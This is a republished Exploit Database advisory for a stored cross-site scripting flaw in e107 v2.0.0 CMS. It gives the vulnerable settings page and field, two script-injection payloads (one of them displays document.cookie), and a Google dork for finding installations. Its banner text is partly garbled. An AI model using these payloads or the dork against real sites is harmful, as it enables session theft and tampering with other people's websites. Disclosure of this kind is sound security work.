e107 2 Bootstrap CMS – Cross-Site Scripting

• Exploit Database
• 110 阅读

• 作者： Ahmet Agar / 0x97
  日期： 2015-01-03
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/35679/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49

  _____ ___________ |_| |_||___/ | |/&apos; |___| |_| | / / |/| \ \/ /\____ |/ / \ |_/ />< .___/ /./ / \___//_/\_\\____/ \_/ by bl4ck s3c     # Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability # Date: 03-01-2014 # Google Dork : Proudly powered by e107 # Exploit Author: Ahmet Agar / 0x97 # Version: 2.0.0 # Vendor Homepage: http://e107.org/ # Tested on: OWASP Mantra & Iceweasel # Vulnerability Description:   CMS user details section is vulnerable to XSS. You can run XSS payloads.   XSS Vulnerability #1:   Go Update user settings page   "http://{target-url}/usersettings.php"   Set Real Name value;   "><script>alert(String.fromCharCode(88, 83, 83))</script>   or   "><script>alert(document.cookie)</script>     ======== Credits: ======== Vulnerability found and advisory written by Ahmet Agar. =========== References: =========== http://www.0x97.info htts://twitter.com/_HacKingZ_